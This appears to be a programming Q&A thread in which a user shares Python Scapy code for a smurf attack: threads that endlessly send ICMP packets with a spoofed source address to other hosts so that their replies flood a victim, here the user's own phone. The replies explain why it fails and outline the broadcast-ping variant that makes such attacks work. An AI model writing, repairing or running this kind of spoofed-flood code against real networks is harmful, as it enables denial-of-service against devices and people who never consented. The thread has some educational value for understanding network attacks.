# ICMP spoofing won't flood Victim [Python Scapy]

Tags: python, python-3.x, ping, scapy, icmp

I have been trying to perform a smurf attack on my phone, I have been using scapy in python to create spoofed ICMP pakcets with the spoofed source as my phone. I then sent these packets to all computers on the network (IPs are present the list `send_icmp`) repeatedly. However, my phone kept on connecting to the internet fine. What's wrong? Here's my code:

```
def smurf(victim):

    for ip in send_icmp:
        t = threading.Thread(target = __send_spoofed_icmp, args = (ip,victim))
        t.daemon = True
        t.start()
        icmp_threads.append(t)

    for t in icmp_threads:
        t.join()

def __send_spoofed_icmp(ip,victim):
    print("[+] Sending packets to "+ip)
    packet = IP(src=victim,dst=ip)/ICMP()
    while 1:
        send(packet,verbose = 0)
```

Comment: Could the computers on the network be dropping the ping requests?

Comment: If this is on an internal network, I doubt you have enough hosts to flood your phone's NIC. If you have an android download a terminal emulator (like Termux) and run `watch -n 1 ifconfig wlan0` . Under RX packets you should see a lot of dropped packets if this is working.

Comment: @Totem perhaps, unfortunately I have have no means of testing this as far as I know. I am using Ubuntu and all the other computers on the network are windows. And then there's my phone which doesn't event have a terminal.

Comment: @vesche I downloaded Termux and you are right. My program had an insignificant affect on the number of RX bytes, and 0 packets were ever dropped.

Comment: That's what I figured, you'd probably need hundreds of hosts to flood a NIC with a smurf attack like this. These attacks used to be done by spoofing the source IP of the vitcim and pinging the broadcast IP so every host on the network would be constantly resonding to the victim. However, most all routers disable ping responses via the broadcast IP in this day and age.